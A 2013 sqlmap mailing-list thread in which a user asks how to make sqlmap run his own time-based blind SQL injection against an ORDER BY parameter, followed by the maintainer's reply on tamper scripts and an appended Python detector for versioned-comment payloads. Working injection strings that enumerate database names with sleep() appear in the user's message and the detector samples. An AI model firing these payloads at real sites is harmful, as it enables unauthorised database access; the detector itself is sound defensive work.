Hi.

You haven't told us anything that could help. Neither the switches/options used,
nor the tamper scripts used, nothing.

You are using some custom tamper script(s), as I can see "/*!50000" in
the payload (we don't have this in our tamper scripts).

Nevertheless, I've tried to reproduce your run with --technique=T
--tamper="between,versionedmorekeywords,ifnull2ifisnull"
--dbs against our testing environment and everything works out of the box.

Kind regards,
Miroslav Stampar

On Thu, Feb 21, 2013 at 5:22 PM, Кирилл Бельков <lir...@gmail.com> wrote:

> Hello, all.
>
> I'm trying to exploit the blind injection in the following query:
>
> $var = $_GET['var'];
> SELECT id,name FROM people ORDER BY $var
>
> sqlmap finds vulnerabilities, but they can not be used.
>
> sqlmap sends the following query:
>
> name AND 561/*!50000=*/IF((ORD(MID((/*!50000SELECT*/
> IF(ISNULL(/*!50000CAST*/(/*!50000COUNT*/(DISTINCT(schema_name)) AS
> CHAR)),CHAR(32),/*!50000CAST*/(/*!50000COUNT*/(DISTINCT(schema_name)) AS
> CHAR)) FROM /*!50000information_schema*/.SCHEMATA),1,1)) NOT BETWEEN 0 AND
> 1),SLEEP(5),561)
>
> [22:20:36] [ERROR] unable to retrieve the number of databases
>
> but it does not work. May interfere with some kind of filter.
>
> But my request in browser url:
>
> index.php?var=CASE WHEN (SELECT ASCII(SUBSTRING(schema_name, 1, 1)) FROM
> /*!50000information_schema*/.SCHEMATA limit 0,1) NOT BETWEEN 0 AND 65 THEN
> sleep(10) ELSE date END
>
> It takes a successful ... How can I get sqlmap to use my method of attack
> instead of the one it uses by default?
>
> Sincerely, Kirill
>
> P.S. Sorry for my bad English.
>
>
> ------------------------------------------------------------------------------
> Everyone hates slow websites. So do we.
> Make your web apps faster with AppDynamics
> Download AppDynamics Lite for free today:
> http://p.sf.net/sfu/appdyn_d2d_feb
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm
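
For defenders reviewing request logs of an endpoint like the one in this thread, an added example (not from either poster and not sqlmap code): it unwraps MySQL versioned comments such as /*!50000...*/ before keyword matching on the ORDER BY parameter, and shows what a filter misses if it strips them as ordinary comments. The keyword list, function names and sample request lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, quote

# MySQL executes the body of /*!NNNNN ... */ when the server version is at
# least NNNNN, so the body is live SQL and must not be discarded as a comment.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
ANY_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# Assumed keyword list for this illustration, not a complete signature set.
KEYWORDS = re.compile(r"\b(sleep|benchmark|information_schema|select|case)\b", re.I)
# A legitimate ORDER BY value here is a bare column name.
IDENTIFIER = re.compile(r"[A-Za-z_][A-Za-z0-9_]*\Z")

def normalize(value, unwrap=True):
    """Unwrap versioned comments (optional), drop the rest, squeeze spaces."""
    if unwrap:
        value = VERSIONED.sub(r" \1 ", value)
    value = ANY_COMMENT.sub(" ", value)
    return " ".join(value.split())

def keywords(value, unwrap=True):
    """Sorted, lower-cased keywords found in the normalized value."""
    return sorted({k.lower() for k in KEYWORDS.findall(normalize(value, unwrap))})

def inspect_sort_param(url, param="var"):
    """Classify the sort parameter of one request URL."""
    values = parse_qs(urlsplit(url).query).get(param, [])
    if not values:
        return ("absent", [])
    if IDENTIFIER.match(values[0]):
        return ("ok", [])
    hits = keywords(values[0])
    return ("sqli-suspect" if hits else "malformed", hits)

# Constructed request lines; the second carries the payload quoted in the thread.
BROWSER_PAYLOAD = ("CASE WHEN (SELECT ASCII(SUBSTRING(schema_name, 1, 1)) FROM "
                   "/*!50000information_schema*/.SCHEMATA limit 0,1) "
                   "NOT BETWEEN 0 AND 65 THEN sleep(10) ELSE date END")
SAMPLES = [
    "/index.php?var=name",
    "/index.php?var=" + quote(BROWSER_PAYLOAD),
    "/index.php?var=" + quote("name desc"),
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(inspect_sort_param(url), url[:40])
    # Stripping comments without unwrapping hides the schema reference.
    print(keywords(BROWSER_PAYLOAD, unwrap=False))
```
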